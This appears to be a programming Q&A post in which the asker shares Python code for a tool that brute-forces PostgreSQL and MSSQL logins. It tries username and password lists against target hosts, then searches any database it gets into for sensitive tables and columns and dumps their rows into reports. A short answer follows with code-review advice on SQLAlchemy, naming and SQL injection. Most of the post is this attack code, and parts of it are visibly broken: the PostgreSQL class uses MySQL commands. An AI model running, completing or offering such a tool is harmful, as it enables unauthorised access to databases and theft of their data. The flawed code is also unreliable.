# How to modify the PostgreSQL psycopg to accept variables instead of values

Tags: python-3.x, postgresql, python-2.7, brute-force

I am creating a dictionary attacking tool on PostgreSQL. The tool is inspired by the work of m8r0wn - enumdb tool. Mikes tool is aimed at MySQL and MSSQL. I aim to use the same approach he used but modify the actions and output file. The script should

1) Read a CSV file that contains targets and ports, one per line 127.0.0.1,3380. 
2) when provided a list of usernames and/or passwords, it will cycle through each targeted host looking for valid credentials. By default, it will use newly discovered credentials to search for sensitive information in the host's databases via keyword searches on the table or column names.
3) This information can then be extracted and reported to a JSON, .csv or .xlsx output file.

I have a semi functional code, but I suspect the PostgreSQL connection function is not working due to the logic behind passing parameters. I am interested in suggestions on how best I could present the tools results as a JSON file.

I understand that in Python, we have several modules available to connect and work with PostgreSQL which include:

```
Psycopg2
pg8000
py-postgresql
PyGreSQL
ocpgdb
bpgsql
SQLAlchemy
```

see also https://www.a2hosting.co.za/kb/developer-corner/postgresql/connecting-to-postgresql-using-python

The connection methods I have tried include:

## import psycopg2

from psycopg2 import Error
conn = psycopg2.connect(host=host, dbname=db_name, user=_user, password=_pass, port=port)

## import pg

conn = pg.DB(host=args.hostname, user= _user, passwd= _pass)

sudo pip install pgdb

## import pgdb

conn = pgdb.connect(host=args.hostname, user= _user, passwd= _pass)

I am not sure how to pass the different _user and _pass guesses into the pyscopg2 for instance, without breaking the code.

I have imported the following libraries

```
import re
import psycopg2
from psycopg2 import Error
import pgdb
#import MySQLdb
import pymssql
import argparse
from time import sleep
from sys import exit, argv
from getpass import getpass
from os import path, remove
from openpyxl import Workbook
from threading import Thread, activeCount
```

The PgSQL block is as follows:

```
##########################################
# PgSQL DB Class
##########################################
class pgsql():
    def connect(self, host, port, user, passwd, verbose):
        try:
            con = pgdb.connect(host=host, port=port, user=user, password=passwd, connect_timeout=3)
            con.query_timeout = 15
            print_success("[*] Connection established {}:{}@{}".format(user,passwd,host))
            return con
        except Exception as e:
            if verbose:
                print_failure("[!] Login failed {}:{}@{}\t({})".format(user,passwd,host,e))
            else:
                print_failure("[!] Login failed {}:{}@{}".format(user, passwd, host))
            return False

    def db_query(self, con, cmd):
        try:
            cur = con.cursor()
            cur.execute(cmd)
            data = cur.fetchall()
            cur.close()
        except:
            data = ''
        return data

    def get_databases(self, con):
        databases = []
        for x in self.db_query(con, 'SHOW DATABASES;'):
            databases.append(x[0])
        return databases

    def get_tables(self, con, database):
        tables = []
        self.db_query(con, "USE {}".format(database))
        for x in self.db_query(con, 'SHOW TABLES;'):
            tables.append(x[0])
        return tables

    def get_columns(self, con, database, table):
        # database var not used but kept to support mssql
        columns = []
        for x in self.db_query(con, 'SHOW COLUMNS FROM {}'.format(table)):
            columns.append(x[0])
        return columns

    def get_data(self, con, database, table):
        # database var not used but kept to support mssql
        return self.db_query(con, 'SELECT * FROM {} LIMIT {}'.format(table, SELECT_LIMIT))
```

The MSSQL is as follows:

```
# MSSQL DB Class

class mssql():
    def connect(self, host, port, user, passwd, verbose):
        try:
            con = pymssql.connect(server=host, port=port, user=user, password=passwd, login_timeout=3, timeout=15)
            print_success("[*] Connection established {}:{}@{}".format(user,passwd,host))
            return con
        except Exception as e:
            if verbose:
                print_failure("[!] Login failed {}:{}@{}\t({})".format(user,passwd,host,e))
            else:
                print_failure("[!] Login failed {}:{}@{}".format(user, passwd, host))
            return False

    def db_query(self, con, cmd):
        try:
            cur = con.cursor()
            cur.execute(cmd)
            data = cur.fetchall()
            cur.close()
        except:
            data = ''
        return data

    def get_databases(self, con):
        databases = []
        for x in self.db_query(con, 'SELECT NAME FROM sys.Databases;'):
            databases.append(x[0])
        return databases

    def get_tables(self, con, database):
        tables = []
        for x in self.db_query(con, 'SELECT NAME FROM {}.sys.tables;'.format(database)):
            tables.append(x[0])
        return tables

    def get_columns(self, con, database, table):
        columns = []
        for x in self.db_query(con, 'USE {};SELECT column_name FROM information_schema.columns WHERE table_name = \'{}\';'.format(database, table)):
            columns.append(x[0])
        return columns

    def get_data(self, con, database, table):
        return self.db_query(con, 'SELECT TOP({}) * FROM {}.dbo.{};'.format(SELECT_LIMIT, database, table))
```

The main function block:

```
def main(args):
    try:
        for t in args.target:
            x = Thread(target=enum_db().db_main, args=(args, t,))
            x.daemon = True
            x.start()
            # Do not exceed max threads
            while activeCount() > args.max_threads:
                sleep(0.001)
        # Exit all threads before closing
        while activeCount() > 1:
            sleep(0.001)
    except KeyboardInterrupt:
        print("\n[!] Key Event Detected...\n\n")
        exit(0)


if __name__ == '__main__':
    version = '1.0.7'
    try:
        args = argparse.ArgumentParser(description=("""
                           {0}   (v{1})
    --------------------------------------------------
Brute force Juggernaut is a PgSQL brute forcing tool.**""").format(argv[0], version), formatter_class=argparse.RawTextHelpFormatter, usage=argparse.SUPPRESS)

        user = args.add_mutually_exclusive_group(required=True)
        user.add_argument('-u', dest='users', type=str, action='append', help='Single username')
        user.add_argument('-U', dest='users', default=False, type=lambda x: file_exists(args, x), help='Users.txt file')

        passwd = args.add_mutually_exclusive_group()
        passwd.add_argument('-p', dest='passwords', action='append', default=[], help='Single password')
        passwd.add_argument('-P', dest='passwords', default=False, type=lambda x: file_exists(args, x), help='Password.txt file')

        args.add_argument('-threads', dest='max_threads', type=int, default=3, help='Max threads (Default: 3)')
        args.add_argument('-port', dest='port', type=int, default=0, help='Specify non-standard port')
        args.add_argument('-r', '-report', dest='report', type=str, default=False, help='Output Report: csv, xlsx (Default: None)')
        args.add_argument('-t', dest='dbtype', type=str, required=True, help='Database types currently supported: mssql, pgsql')
        args.add_argument('-c', '-columns', dest="column_search", action='store_true', help="Search for key words in column names (Default: table names)")
        args.add_argument('-v', dest="verbose", action='store_true', help="Show failed login notices & keyword matches with Empty data sets")
        args.add_argument('-brute', dest="brute", action='store_true', help='Brute force only, do not enumerate')
        args.add_argument(dest='target', nargs='+', help='Target database server(s)')
        args = args.parse_args()

        # Put target input into an array
        args.target = list_targets(args.target[0])

        # Get Password if not provided
        if not args.passwords:
            args.passwords = [getpass("Enter password, or continue with null-value: ")]

        # Define default port based on dbtype
        if args.port == 0: args.port = default_port(args.dbtype)

        # Launch Main
        print("\nStarting enumdb v{}\n".format(version) + "-" * 25)
        main(args)
    except KeyboardInterrupt:
        print("\n[!] Key Event Detected...\n\n")
        exit(0)


I am aware that documentation states here http://initd.org/psycopg/docs/module.html states about how connection parameters can be specified. I would like to pass password guesses into the brute class and recursively try different combinations.
```

Answer (score 2):

[PEP-8](https://www.python.org/dev/peps/pep-0008/) asks that you please give classes a name
starting with a capital letter, e.g. `Pgsql`.
You mentioned that the pgsql `connect()` method is not working properly,
but didn't offer any diagnostics such as a stack trace.

You seem to be working too hard, given that the sqlalchemy layer
has already addressed the DB porting issue quite nicely.
Just assemble a [connect string](https://docs.sqlalchemy.org/en/13/core/engines.html?highlight=create_engine#sqlalchemy.create_engine) starting with
the name of the appropriate DB package,
and let sqlalchemy take care of the rest.

All your methods accept `con` as an argument.
You really want to factor that out as the object attribute `self.con`.

The `db_query()` method apparently assumes that
arguments for WHERE clauses already appear, properly quoted, in `cmd`.
According to [Little Bobby's mother](https://www.xkcd.com/327/),
it makes sense to accept query args [according to the API](https://docs.sqlalchemy.org/en/13/core/connections.html#sqlalchemy.engine.Connection.execute),
rather than worrying about potential for [SQL injection](https://en.wikipedia.org/wiki/SQL_injection).